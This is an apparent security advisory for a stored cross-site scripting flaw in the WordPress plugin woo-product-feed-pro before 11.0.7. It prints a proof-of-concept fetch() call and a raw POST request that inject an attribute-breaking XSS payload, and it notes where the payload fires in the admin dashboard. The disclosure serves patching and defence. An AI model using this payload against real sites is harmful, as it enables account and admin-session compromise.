The plugin does not have authorisation and CSRF check in some of its AJAX actions, allowing any authenticated users to call then, which could lead to Stored Cross-Site Scripting issue (which will be triggered in the admin dashboard) due to the lack of escaping. v10.9.1 added a CSRF check, however authorisation was still missing until 11.0.7
fetch(“https://example.com/wp-admin/admin-ajax.php”, { “headers”: { “content-type”: “application/x-www-form-urlencoded”, }, “body”: “action=woosea_add_attributes&attribute;_name=x&attribute;_value='" style=animation-name:blinker onanimationstart=alert(1) x=&active;=true”, “method”: “POST” }); POST /wp-admin/admin-ajax.php HTTP/1.1 Accept: / Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate content-type: application/x-www-form-urlencoded Content-Length: 138 Connection: close Cookie: [any authenticated user] action=woosea_add_attributes&attribute;_name=x&attribute;_value='"+style=animation-name:blinker+onanimationstart=alert(/XSS/)+x=&active;=true The XSS will be triggered when creating a feed (at the second step/page)
CPE | Name | Operator | Version |
---|---|---|---|
woo-product-feed-pro | lt | 11.0.7 |